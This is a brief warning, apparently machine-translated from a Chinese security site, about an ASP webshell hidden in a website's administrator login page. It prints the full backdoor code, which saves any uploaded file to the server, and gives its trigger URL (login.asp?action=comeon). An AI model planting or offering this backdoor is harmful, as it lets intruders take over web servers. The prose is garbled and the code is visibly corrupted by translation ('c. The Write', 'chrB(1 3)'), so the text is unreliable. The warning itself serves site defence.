Hidden in the administrator login page of the hazard-vulnerability warning-the black bar safety net

ID MYHACK58:62201026581
Type myhack58
Reporter 佚名
Modified 2010-03-29T00:00:00


If your site is being invaded, you hard to erase later, not several days. And“disease”. Suggest you look at your admin login page there is no similar to the following code:

<%if request. QueryString("action")="comeon" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobject(b):c. Type=1:c. Open:c. The Write Request. BinaryRead(a):c. Position=0:d=c. Read:e=chrB(1 3)&chrB(1 0):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h. Type=1:h. Open:c. Position=f+1:c. Copyto h,g-f-3:h. Position=0:h. type=2:h. CharSet="BIG5":i=h. Readtext:h. close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h. Type=1:h. Open:c. Position=k-1:c. CopyTo h,l:h.SaveToFile server. mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> <%end if%>

  1. The surface is no difference of this is hidden WEBSHELL

As long as this: login. asp? action=comeon

Appears the upload page!